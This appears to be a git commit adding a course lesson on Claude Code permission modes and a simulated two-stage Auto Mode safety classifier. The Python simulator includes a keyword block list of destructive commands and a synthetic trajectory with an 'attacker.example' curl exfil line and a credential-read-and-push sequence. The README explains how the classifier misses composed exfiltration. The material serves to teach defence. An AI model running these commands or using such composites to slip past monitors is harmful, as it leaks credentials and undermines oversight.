feat(phase-15/10): Claude Code permission modes and Auto Mode classifier

This commit is contained in:
Rohit Ghumare
2026-04-24 11:57:34 +01:00
parent d1c65804ca
commit 29623ffa98
5 changed files with 390 additions and 0 deletions
@@ -0,0 +1,92 @@
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 880 540" font-family="Georgia, 'Times New Roman', serif">
<defs>
<marker id="arrow" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="6" markerHeight="6" orient="auto">
<path d="M0,0 L10,5 L0,10 z" fill="#1a1a1a"/>
</marker>
<style>
.box { fill: #faf6ef; stroke: #1a1a1a; stroke-width: 1.5; }
.hot { fill: #fff1d6; stroke: #c0392b; stroke-width: 1.5; }
.warn { fill: #fde0b4; stroke: #b5651d; stroke-width: 1.5; }
.cool { fill: #e6f4ea; stroke: #2e7d32; stroke-width: 1.5; }
.cold { fill: #dfe9ff; stroke: #2c5ea9; stroke-width: 1.5; }
.dsk { fill: #e9e6ff; stroke: #5a4fcf; stroke-width: 1.5; }
.label { font-size: 13px; font-weight: 600; fill: #1a1a1a; }
.content { font-size: 11px; font-family: 'Menlo', monospace; fill: #333; }
.small { font-size: 10px; font-family: 'Menlo', monospace; fill: #555; }
.caption { font-size: 11px; fill: #555; font-style: italic; }
.title { font-size: 16px; font-weight: 700; fill: #1a1a1a; }
</style>
</defs>
<text x="440" y="26" text-anchor="middle" class="title">Claude Code permission modes and the Auto Mode classifier</text>
<rect x="40" y="50" width="800" height="460" class="box"/>
<!-- Permission ladder -->
<text x="60" y="80" class="label">permission ladder (tight -&gt; loose)</text>
<rect x="60" y="96" width="130" height="46" class="cool"/>
<text x="125" y="116" text-anchor="middle" class="label">plan</text>
<text x="125" y="132" text-anchor="middle" class="small">ask before anything</text>
<rect x="200" y="96" width="130" height="46" class="cold"/>
<text x="265" y="116" text-anchor="middle" class="label">default</text>
<text x="265" y="132" text-anchor="middle" class="small">ask on risky ops</text>
<rect x="340" y="96" width="130" height="46" class="dsk"/>
<text x="405" y="116" text-anchor="middle" class="label">acceptEdits</text>
<text x="405" y="132" text-anchor="middle" class="small">writes auto; exec asks</text>
<rect x="480" y="96" width="130" height="46" class="warn"/>
<text x="545" y="116" text-anchor="middle" class="label">autoMode</text>
<text x="545" y="132" text-anchor="middle" class="small">classifier approves</text>
<rect x="620" y="96" width="90" height="46" class="hot"/>
<text x="665" y="116" text-anchor="middle" class="label">yolo</text>
<text x="665" y="132" text-anchor="middle" class="small">ephemeral only</text>
<rect x="720" y="96" width="110" height="46" class="hot"/>
<text x="775" y="116" text-anchor="middle" class="label">bypassPermissions</text>
<text x="775" y="132" text-anchor="middle" class="small">throwaway sandbox</text>
<!-- Auto Mode internals -->
<rect x="60" y="170" width="770" height="200" class="box"/>
<text x="445" y="192" text-anchor="middle" class="label">Auto Mode (March 24, 2026) — two-stage safety classifier</text>
<rect x="80" y="210" width="180" height="110" class="cool"/>
<text x="170" y="232" text-anchor="middle" class="label">proposed action</text>
<text x="170" y="252" text-anchor="middle" class="small">tool + payload</text>
<text x="170" y="270" text-anchor="middle" class="small">from agent loop</text>
<rect x="290" y="210" width="180" height="110" class="warn"/>
<text x="380" y="232" text-anchor="middle" class="label">Stage 1 classifier</text>
<text x="380" y="252" text-anchor="middle" class="small">single-token check</text>
<text x="380" y="270" text-anchor="middle" class="small">runs in parallel</text>
<text x="380" y="288" text-anchor="middle" class="small">cheap, keyword rule</text>
<rect x="500" y="210" width="180" height="110" class="hot"/>
<text x="590" y="232" text-anchor="middle" class="label">Stage 2 review</text>
<text x="590" y="252" text-anchor="middle" class="small">chain-of-thought</text>
<text x="590" y="270" text-anchor="middle" class="small">trajectory context</text>
<text x="590" y="288" text-anchor="middle" class="small">(only on flags)</text>
<rect x="710" y="210" width="120" height="110" class="cold"/>
<text x="770" y="232" text-anchor="middle" class="label">HITL</text>
<text x="770" y="252" text-anchor="middle" class="small">low confidence</text>
<text x="770" y="270" text-anchor="middle" class="small">escalation</text>
<path d="M260 265 L290 265" stroke="#1a1a1a" stroke-width="1.5" marker-end="url(#arrow)"/>
<path d="M470 265 L500 265" stroke="#1a1a1a" stroke-width="1.5" marker-end="url(#arrow)"/>
<path d="M680 265 L710 265" stroke="#1a1a1a" stroke-width="1.5" marker-end="url(#arrow)"/>
<text x="380" y="340" text-anchor="middle" class="small">not flagged -&gt; execute immediately</text>
<text x="590" y="340" text-anchor="middle" class="small">hard-block on priv-esc / exfil shapes</text>
<!-- Budget line -->
<rect x="60" y="390" width="770" height="100" class="hot"/>
<text x="445" y="412" text-anchor="middle" class="label">budget controls are non-negotiable (Lesson 13)</text>
<text x="80" y="434" class="content">max_turns = hard cap on agent loop iterations</text>
<text x="80" y="450" class="content">max_budget_usd = dollar kill switch; aborts session on breach</text>
<text x="80" y="466" class="content">per-tool caps = e.g. no more than N WebFetch calls per session</text>
<text x="80" y="482" class="small">Anthropic shipped Auto Mode as a research preview; classifier is a layer, not a solution.</text>
</svg>

After

Width:  |  Height:  |  Size: 5.4 KiB

@@ -0,0 +1,149 @@
"""Two-stage safety classifier simulator — stdlib Python.
Stage 1: cheap keyword rule (single-token-equivalent). Runs on every action.
Stage 2: slower multi-rule review (chain-of-thought-equivalent). Runs on
flagged actions only. HITL escalation if Stage 2 is not confident.
The driver feeds in a synthetic trajectory: benign actions, prompt injection,
a repetitive loop, and one "legitimate-channel exfiltration" composite. The
last case is the point: individual actions pass both stages while the
composition is the risk.
"""
from __future__ import annotations
from dataclasses import dataclass, field
# ---------- Action shape ----------
@dataclass
class Action:
tool: str
payload: str
note: str = ""
# ---------- Stage 1: cheap keyword rule ----------
STAGE1_FLAG_KEYWORDS = (
"rm -rf /",
"curl ", # any external curl in a shell action
"; dd ",
"sudo ",
"chmod 777",
"chown ",
"iptables",
"kubectl delete",
"drop table",
"DROP TABLE",
"exec('",
"base64 -d",
"aws s3 rb",
)
def stage1(a: Action) -> bool:
"""Return True if Stage 1 flags the action."""
hay = f"{a.tool} {a.payload}".lower()
return any(k.lower() in hay for k in STAGE1_FLAG_KEYWORDS)
# ---------- Stage 2: deeper multi-rule review ----------
def stage2(a: Action, history: list[Action]) -> tuple[bool, str]:
"""Return (flag, reason). More expensive review of a flagged action
plus trajectory context."""
payload = a.payload.lower()
# Rule 1: outbound exfil to non-approved hosts
if "curl " in payload and ("attacker" in payload or "paste" in payload or "webhook.site" in payload):
return True, "exfiltration-shaped URL"
# Rule 2: destructive fs operation at repo root
if "rm -rf" in payload and ("/" in payload or "$home" in payload):
return True, "destructive filesystem op at root"
# Rule 3: repetitive loop (same tool+payload 5 times running)
if len(history) >= 4:
tail = history[-4:]
if all(t.tool == a.tool and t.payload == a.payload for t in tail):
return True, "repetitive loop detected (>=5 identical calls)"
# Rule 4: high-privilege escalation
if "sudo " in payload or "chmod 777" in payload:
return True, "privilege escalation shape"
# Default: not confident -> escalate to HITL rather than approve
return True, "low-confidence reviewer -> HITL"
# ---------- Driver ----------
def classify(trajectory: list[Action]) -> None:
history: list[Action] = []
counts = {"approved_s1": 0, "flagged_s1": 0, "approved_s2": 0,
"blocked_s2": 0, "hitl_s2": 0}
for i, a in enumerate(trajectory, 1):
s1_flag = stage1(a)
if not s1_flag:
counts["approved_s1"] += 1
verdict = "APPROVED (S1 fast path)"
reason = ""
else:
counts["flagged_s1"] += 1
s2_flag, reason = stage2(a, history)
if not s2_flag:
counts["approved_s2"] += 1
verdict = "APPROVED (S2 deep review)"
else:
if reason == "low-confidence reviewer -> HITL":
counts["hitl_s2"] += 1
verdict = "ESCALATED to HITL"
else:
counts["blocked_s2"] += 1
verdict = "BLOCKED (S2)"
print(f" {i:>2}. {a.tool:<10} {a.payload[:44]:<44} -> {verdict} "
f"{reason}")
history.append(a)
print()
print(f" summary: {counts}")
def main() -> None:
print("=" * 80)
print("AUTO MODE TWO-STAGE CLASSIFIER SIMULATOR (Phase 15, Lesson 10)")
print("=" * 80)
print()
# Synthetic trajectory mixing safe, injected, repetitive, and composite
traj = [
Action("read", "pyproject.toml"),
Action("edit", "src/app.py: fix off-by-one"),
Action("run", "pytest -q"),
Action("shell", "curl http://attacker.example/exfil"), # injection
Action("shell", "rm -rf /"), # destructive
Action("shell", "sudo apt install neofetch"), # priv esc
Action("read", "logs/app.log"),
Action("read", "logs/app.log"),
Action("read", "logs/app.log"),
Action("read", "logs/app.log"),
Action("read", "logs/app.log"), # repetitive loop
# Composite: each step is safe; together they exfiltrate.
Action("read", "~/.aws/credentials"),
Action("write", "/tmp/secrets.txt with credential blob"),
Action("shell", "git add /tmp/secrets.txt && git push"),
]
classify(traj)
print()
print("=" * 80)
print("HEADLINE: classifier is a layer, not a solution")
print("-" * 80)
print(" S1 catches explicit injection shapes cheaply and in parallel.")
print(" S2 catches loops and privilege escalation via reasoning.")
print(" Neither stage catches the 3-step composite at the end: each")
print(" action is locally safe, the composition exfiltrates credentials.")
print(" Budgets, allowlists, and trajectory audits (Lessons 12-16)")
print(" remain required. Auto Mode shipped as a research preview.")
if __name__ == "__main__":
main()
@@ -0,0 +1,109 @@
# Claude Code as an Autonomous Agent: Permission Modes and Auto Mode
> Claude Code exposes seven permission modes. "plan" asks before every action, "default" asks only for risky ones, "acceptEdits" auto-approves file writes but still confirms shell execution, and "bypassPermissions" approves everything. Auto Mode (March 24, 2026) replaces per-action approval with a two-stage parallel safety classifier: a single-token fast check runs on every action; flagged actions kick off a chain-of-thought deep review. Action budgets are enforced via `max_turns` and `max_budget_usd`. Auto Mode shipped as a research preview — Anthropic has stated explicitly that the classifier is not sufficient alone.
**Type:** Learn
**Languages:** Python (stdlib, two-stage classifier simulator)
**Prerequisites:** Phase 15 · 01 (Long-horizon agents), Phase 15 · 09 (Coding-agent landscape)
**Time:** ~45 minutes
## The Problem
An autonomous coding agent on your machine is a distinct security category. The attack surface is everything the agent can reach — file system, network, credentials, clipboard, any browser tab, any open terminal. Bruce Schneier and others have flagged this publicly: computer-use agents are not a "feature update" of chatbots, they are a new kind of tool with a new kind of risk profile.
Claude Code's permission system is Anthropic's answer. Rather than one "autonomous / not autonomous" switch, there are seven modes spanning a capability ladder: plan → default → acceptEdits → … → bypassPermissions. Each mode is a different trade-off between speed and review-per-action. Auto Mode (March 2026) adds a two-stage classifier that moves approval off the user's critical path for actions the classifier judges safe, while preserving a review layer for actions the classifier flags.
The engineering question: what does this system catch, what does it miss, and which mode does a given task actually warrant?
## The Concept
### The seven permission modes
| Mode | Behavior | When to use |
|---|---|---|
| `plan` | Agent proposes a plan; user approves the whole plan; every action is reviewed before execution | Unfamiliar task; prod-adjacent code; first time using the agent on a repo |
| `default` | Agent runs actions; prompts user for any "risky" action (shell exec, destructive operations, network calls) | Most interactive coding sessions |
| `acceptEdits` | File writes auto-approve; shell exec and network calls still prompt | Refactoring pass across many files |
| `acceptExec` | Shell commands auto-approve within a curated allowlist; writes auto-approve | Tight inner loops where every shell command is `npm test` or similar |
| `autoMode` | Two-stage safety classifier; flagged actions elevate to review | Long-horizon unattended runs in a constrained workspace |
| `yolo` | Skips most prompts; still runs tool allowlist / denylist | Ephemeral sandboxes, CI jobs, research scripts |
| `bypassPermissions` | Approves everything | Documented as "only inside ephemeral containers you are willing to throw away" |
(Names above match public Claude Code docs; "yolo" is the informal shorthand for the permissive middle ground.)
### Auto Mode in one page
Auto Mode (launched March 24, 2026) is the first permission mode to delegate per-action approval to a model. Structure:
1. **Stage 1 — single-token classifier.** Runs on every proposed action. Cheap. Returns "safe" or "flag." Designed to run in parallel with the main agent loop so approved actions do not sit in a queue.
2. **Stage 2 — chain-of-thought deep review.** Runs only on flagged actions. Explicit reasoning trace over the action, the current state of the session, and the declared task. Escalates to user HITL if the deep review is not confident.
Budget controls sit alongside the classifier:
- `max_turns` — total iterations in a session.
- `max_budget_usd` — dollar cap that aborts the session.
- action-count limits per tool (no more than N `WebFetch` calls, etc.).
### What the system catches
- Straightforward prompt injection into tool inputs where the injected instruction maps to a known-risky action shape.
- Repetitive tool loops — the classifier can see action N+1 is nearly identical to action N, five times in a row.
- Clearly out-of-scope shell commands on an otherwise file-edit-only session.
### What the system can miss
- **Subtle prompt injection** that modulates behavior without producing a single flagged action. Indirect prompt injection is not a fully patchable vulnerability (OpenAI preparedness head, 2025, on browser agents — see Lesson 11).
- **Semantic-level misbehavior.** Every individual action can look safe while the composed trajectory is harmful. The classifier judges the action; it does not re-derive the user's intent.
- **Exfiltration through legitimate channels.** Writing data to a file you own, then `git push`ing to a public repo, is a sequence of allowed actions whose composition is the problem.
### Research preview framing
Anthropic shipped Auto Mode as a research preview. The documentation is explicit that the classifier is a layer, not a solution: users are expected to combine Auto Mode with budgets, allowlists, isolated workspaces, and trajectory audits (Lessons 12–16). The preview framing also reflects the documented evaluation-vs-deployment gap (Lesson 1) — a classifier that passes offline evals can behave differently in a real session where the user's context is ambiguous.
### Where this ladder lives in your workflow
- Unfamiliar task: start in `plan`. Reading the plan is cheaper than rolling back a bad run.
- Known refactor: `acceptEdits` saves a lot of confirmation clicks.
- Unattended background run: `autoMode` only inside a workspace whose blast radius you have measured (no credentials, no production mounts, no egress you did not opt into).
- Ephemeral containers: `yolo` / `bypassPermissions` is acceptable if and only if the container and its credentials are disposable.
## Use It
`code/main.py` simulates the two-stage classifier. Stage 1 is a cheap keyword rule over proposed actions; Stage 2 is a slower multi-rule reviewer. The driver feeds in a short synthetic trajectory (safe actions, a prompt-injection attempt, a repetitive loop) and shows where the classifier catches and where it misses.
## Ship It
`outputs/skill-permission-mode-picker.md` matches a task description to the right permission mode, budget caps, and required isolation.
## Exercises
1. Run `code/main.py`. Which synthetic action type is never flagged by Stage 1 but always caught by Stage 2? Which is caught by neither?
2. Extend the Stage 1 rule set to catch a specific known-bad shape (e.g., `curl $ATTACKER/exfil`). Measure the false-positive rate on the benign-action sample.
3. Read Anthropic's "How the agent loop works" doc. List every external state the agent touches by default in `default` mode. Which would you need to gate separately before running `autoMode` unattended?
4. Design a 24-hour unattended run budget: `max_turns`, `max_budget_usd`, per-tool caps, allowlists. Justify each number.
5. Describe one trajectory where every individual action is approved by Stage 1 and Stage 2, yet the composed behavior is misaligned. (Lesson 14 covers how kill switches and canary tokens address this.)
## Key Terms
| Term | What people say | What it actually means |
|---|---|---|
| Permission mode | "How much the agent can do" | One of seven named policies controlling per-action approval |
| plan mode | "Ask before anything" | Agent writes a plan; user approves before execution |
| acceptEdits | "Let it write files" | File writes auto-approve; shell exec still prompts |
| autoMode | "Auto approvals" | Two-stage safety classifier; flagged actions escalate |
| bypassPermissions | "Full YOLO" | Approves everything; intended for ephemeral containers |
| Stage 1 classifier | "Fast token check" | Single-token rule over proposed action; runs in parallel |
| Stage 2 classifier | "Deep review" | Chain-of-thought reasoning over flagged actions |
| Research preview | "Not GA" | Anthropic framing for features whose failure mode is still being mapped |
## Further Reading
- [Anthropic — How the agent loop works](https://code.claude.com/docs/en/agent-sdk/agent-loop) — permission modes, budgets, action format.
- [Anthropic — Claude Managed Agents overview](https://platform.claude.com/docs/en/managed-agents/overview) — managed-service execution model.
- [Anthropic — Claude Code product page](https://www.anthropic.com/product/claude-code) — feature surface and Auto Mode announcement.
- [Anthropic — Claude's Constitution (January 2026)](https://www.anthropic.com/news/claudes-constitution) — the reason-based layer that shapes classifier judgments.
- [Anthropic — Measuring agent autonomy in practice](https://www.anthropic.com/research/measuring-agent-autonomy) — internal perspective on long-horizon permission design.
@@ -0,0 +1,40 @@
---
name: permission-mode-picker
description: Match a Claude Code task to the correct permission mode, budget caps, and required isolation before starting a run.
version: 1.0.0
phase: 15
lesson: 10
tags: [claude-code, permission-modes, auto-mode, budgets, isolation]
---
Given a proposed Claude Code task, pick the permission mode, set budgets, and specify the minimum isolation required before the agent is allowed to start.
Produce:
1. **Task profile.** One sentence on what the task does, one sentence on the blast radius if it goes wrong.
2. **Mode recommendation.** One of: `plan`, `default`, `acceptEdits`, `acceptExec`, `autoMode`, `yolo`, `bypassPermissions`. Justify with a single sentence referencing the blast radius.
3. **Budget numbers.** Concrete values for `max_turns`, `max_budget_usd`, and any per-tool caps. For unattended runs over an hour, specify a dollar cap equal to or below what you would pay for a human mistake you cannot roll back.
4. **Isolation requirements.** File-system scope (project directory only, scratch directory, ephemeral container). Network policy (no egress, allowlist only, full). Credential surface (none, scoped token, broad token). For `bypassPermissions` or `yolo`, the run must be inside an ephemeral container with no production credentials mounted.
5. **Trajectory audit plan.** How will a human review the trajectory after the run? Required for `autoMode`, `yolo`, and anything over a 30-minute horizon.
Hard rejects:
- `bypassPermissions` against a repository with uncommitted changes.
- `autoMode` with no budget cap.
- Any mode above `acceptEdits` with broad credentials in the environment (AWS, GCP, GitHub PAT with repo scope).
- Unattended runs longer than one hour with no trajectory audit scheduled.
- Claims that the Auto Mode classifier alone is sufficient for a novel task distribution.
Refusal rules:
- If the user cannot name the blast radius of a failure, refuse and require an explicit worst-case sentence before starting.
- If the user requests `autoMode` in a workspace with production database credentials reachable, refuse and require scoped credentials or an ephemeral container first.
- If the proposed budget cap exceeds what the user is willing to lose on a bad run, refuse and require a lower cap.
Output format:
Return a one-page run card with:
- **Task summary** (one sentence)
- **Blast radius** (one sentence, worst case)
- **Mode** (explicit)
- **Budgets** (`max_turns`, `max_budget_usd`, per-tool caps)
- **Isolation** (fs scope, network policy, credential surface)
- **Audit plan** (who reviews the trajectory, when, against what rubric)